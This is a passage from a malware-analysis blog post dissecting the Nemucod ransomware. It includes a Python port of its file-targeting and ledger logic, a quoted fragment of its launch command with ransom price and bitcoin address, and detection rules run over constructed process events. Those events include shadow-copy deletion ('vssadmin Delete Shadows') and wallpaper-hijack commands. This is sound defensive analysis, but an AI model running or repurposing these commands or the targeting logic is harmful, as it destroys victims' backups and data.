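    "rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|"
    "pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|"
    "vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|"
    "cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|"
    "mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso"
)
TARGET_EXT_RE = re.compile(r"[.](" + TARGET_EXTS + r")$", re.I)


def directory_is_skipped(directory):
    """True if Tree() returns before listing this directory, and so everything below it."""
    return bool(SKIP_DIR_RE.search(directory) or RECYCLE_RE.search(directory))


def file_is_targeted(path):
    """True if the walker would add this file to $_SERVER["files"] for encryption."""
    directory, _, name = path.rpartition("\\")
    return not directory_is_skipped(directory) and TARGET_EXT_RE.search(name) is not None


RECORD_START_RE = re.compile(r"^[A-Za-z]:\\")   # every path Tree() emits starts with <drive>:\


def parse_db(db_text):
    """Parse the <fn>.db ledger written by fputs($db, $file . " " . b64(key) . " " . b64(ct) . " ")."""
    records, current = [], []
    for tok in db_text.split(" "):
        if RECORD_START_RE.match(tok) and current:   # a drive prefix starts the next record
            records.append(current)
            current = []
        if tok:
            current.append(tok)
    if current:
        records.append(current)
    parsed = []
    for toks in records:
        ct_len = len(base64.b64decode(toks[-1]))
        parsed.append({
            "path": " ".join(toks[:-2]),            # file names may contain spaces
            "enc_key_len": len(base64.b64decode(toks[-2])),
            "ct_len": ct_len,
            # phpseclib pads with PKCS#7 by default, so a full 2048-byte read encrypts to 2064
            # bytes; anything shorter means the whole file fitted in the window (assumption).
            "whole_file_in_ledger": ct_len < 2064,
        })
    return parsed


def _record(path, key_len, ct_len):
    """Constructed ledger entry with placeholder bytes, not output of the real sample."""
    return "%s %s %s " % (path, base64.b64encode(b"K" * key_len).decode(),
                          base64.b64encode(b"C" * ct_len).decode())


SAMPLE_DB = (_record("C:\\Users\\bob\\Documents\\Q3 report.docx", 256, 2064)
             + _record("D:\\photos\\IMG_0001.jpg", 256, 16))


if __name__ == "__main__":
    for rec in parse_db(SAMPLE_DB):
        print(rec["path"], rec["ct_len"], file_is_targeted(rec["path"]))
```

Two things fall out of the port that are easy to miss when reading the PHP: the directory filter is a prefix match, so "\temp" also skips a user's Templates folder and "\system" skips System Volume Information, and the extension list includes .php, .js and .vbs, so the walker would also encrypt its own .php file if it were outside an excluded directory (it lives in %TEMP%, which is excluded).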

Section 3 – Execution of the Obfuscated PHP Shell (evil.php)

The third section in the Javascript file secondoutput.js is the following section:

ws.Run(fn+".exe "+cq+fn+".php"+cq+" 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2 0.1075 MIIBIjANBgkqhkiG9w0B

In this section the Javascript uses the PHP interpreter 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.exe (normally called php.exe) to execute the PHP shell 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.php (our evil.php). As you can see below, the interpreter is passed additional arguments after the script path:

157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2 0.1075 MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAi78TzT

On a side note, in section 2 we changed eval to echo to avoid executing the PHP shell on our system and instead write the decoded content to a new file, evil2.php, so we could read the code and understand what the shell does. In section 3 the real script keeps eval, so the decoded code is executed, not printed.

As we saw in section 2, this is where the PHP shell receives the ransom price, the bitcoin address and the public key used during file encryption:

  • Price = 0.1075
  • Bitcoin Address = 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2
  • Public Key = MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAi78TzT4zY95ZcMDYUN3YozYlf3VsLMEEVLi0M9/EVLAsDOasmgUEv+dXrxE55WK8UX6lFV00U6PTwxMgIfJXmUEND6aoIZoPcpdjxoB99ZZZQqclA7R4eO24+OgMltMFrgUqATmP2G1VArMyi36muwh573z5ymtJ+p1TER9yekK0TtcNpZOSZ/hQXL+qHLqjtgrowHPENtjjBMDxffKGQmaU73Pkz3z35Z1qT29YADuwSvtW8fvC6mzUAr9rRXZlD+aNMjec6YSqlyzpWz5kNOoWu8mbyLI0jG6QaGEYxH60IpOc2b2fLnLw7ebN6bMRNvZWdDK4BQ98kcjvowEVLwIDAQAB

The public key argument is the $keypub variable inside the script (see section 2). Please note that on some victim operating systems the execution of the PHP interpreter may generate an error message, as shown in figure 5:

Figure 5: Error Message

This is because the OS is likely missing the Microsoft Visual C++ Redistributable for Visual Studio 2012 Update 4 package. If you are following along and attempting to run this malware on your (isolated) analysis system, you may want to install this package before running the command line. Once you have resolved this issue and executed the Nemucod ransomware PHP shell, you should see the PHP interpreter spawn a cmd.exe process and cmd.exe spawn the mshta.exe process. Figure 6 shows this parent/child process relationship:

Figure 6: parent/child process relation

The mshta.exe process executes the file 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.hta. This file was created by the Nemucod PHP shell and contains instructions on how to decrypt the files, including payment options and how to receive the decryption key. The same message is also displayed as the desktop wallpaper, as you can see in Figure 7:

Figure 7: Ransomware Wallpaper Message
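Putting sections 1 and 3 together gives a process chain that is worth alerting on: a renamed PHP interpreter in %TEMP% started with a .php path, a bitcoin address, a price and a base64 public key as arguments, followed by cmd.exe children that run reg add for the wallpaper, mshta.exe on an .hta in %TEMP% and vssadmin Delete Shadows. The following Python 3 code is an added example, not part of the original post: detection logic run over constructed process-creation events that mirror that chain. The sample events, the user name bob and the rule names are made up for illustration; the command lines are modelled on the ws.Run() call and the exec() calls shown above.

```python
import re

TEMP = "C:\\Users\\bob\\AppData\\Local\\Temp\\"      # assumed victim profile; "bob" is made up
NAME = "157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2"

# Constructed process-creation events (parent image, child image, command line) modelled on
# the chain in figures 1 and 6: wscript.exe -> renamed php.exe -> cmd.exe -> mshta/vssadmin.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\wscript.exe", TEMP + NAME + ".exe",
     TEMP + NAME + '.exe "' + TEMP + NAME + '.php" ' + NAME
     + " 0.1075 MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA"),
    (TEMP + NAME + ".exe", "C:\\Windows\\System32\\cmd.exe",
     'cmd.exe /c reg add "HKCU\\Control Panel\\Desktop" /v Wallpaper /f /t REG_SZ /d "'
     + TEMP + NAME + '.bmp"'),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\mshta.exe",
     'mshta.exe "' + TEMP + NAME + '.hta"'),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\vssadmin.exe",
     "vssadmin.exe Delete Shadows /All /Quiet"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe",
     "notepad.exe C:\\Users\\bob\\notes.txt"),          # benign control record
]


def _in_temp(path):
    return "\\temp\\" in path.lower()


# One rule per observable from sections 1 and 3; each takes (parent, child, command line).
def rule_php_interpreter_ransom_args(parent, child, cmd):
    # an executable in %TEMP% started as: <exe> "<x>.php" <btc address> <price> <base64 SPKI>
    return _in_temp(child) and re.search(
        r'"[^"]+\.php"\s+[13][1-9A-HJ-NP-Za-km-z]{25,34}\s+\d+(?:\.\d+)?\s+MII[A-Za-z0-9+/]', cmd
    ) is not None


def rule_vssadmin_delete_shadows(parent, child, cmd):
    return child.lower().endswith("\\vssadmin.exe") and re.search(r"delete\s+shadows", cmd, re.I) is not None


def rule_mshta_hta_from_temp(parent, child, cmd):
    return child.lower().endswith("\\mshta.exe") and re.search(r'\\temp\\[^"]+\.hta', cmd, re.I) is not None


def rule_wallpaper_set_to_temp_bitmap(parent, child, cmd):
    return re.search(r'reg\s+add\s+"HKCU\\Control Panel\\Desktop".*/v\s+Wallpaper\b.*\\temp\\', cmd, re.I) is not None


RULES = {
    "php_interpreter_ransom_args": rule_php_interpreter_ransom_args,
    "vssadmin_delete_shadows": rule_vssadmin_delete_shadows,
    "mshta_hta_from_temp": rule_mshta_hta_from_temp,
    "wallpaper_set_to_temp_bitmap": rule_wallpaper_set_to_temp_bitmap,
}


def detect(events):
    """[(rule_name, child_image, command_line)] for every event that trips a rule."""
    hits = []
    for parent, child, cmd in events:
        for name, rule in RULES.items():
            if rule(parent, child, cmd):
                hits.append((name, child, cmd))
    return hits


def triage(events):
    """Distinct rules tripped on a host; several together are the whole Nemucod chain, not noise."""
    return sorted({name for name, _, _ in detect(events)})


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit[0], "<-", hit[2])
```

The vssadmin and mshta rules will fire on their own in plenty of environments (backup software, legitimate HTAs), so the value is in triage(): the first rule alone is already specific to this dropper, and any two of the others from the same host within a short window is the chain from figure 6, not background noise.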

This is pretty much the entire functionality of the Nemucod ransomware in a nutshell. Blog post part III will include dynamic and static analysis of the Nemucod and Kovter malware variants.

Indicators of Compromise 

The following list contains the MD5 hashes of files related to this attack:


The following domains:

At the time of writing this blog post, multiple security vendors had blacklisted these domains.
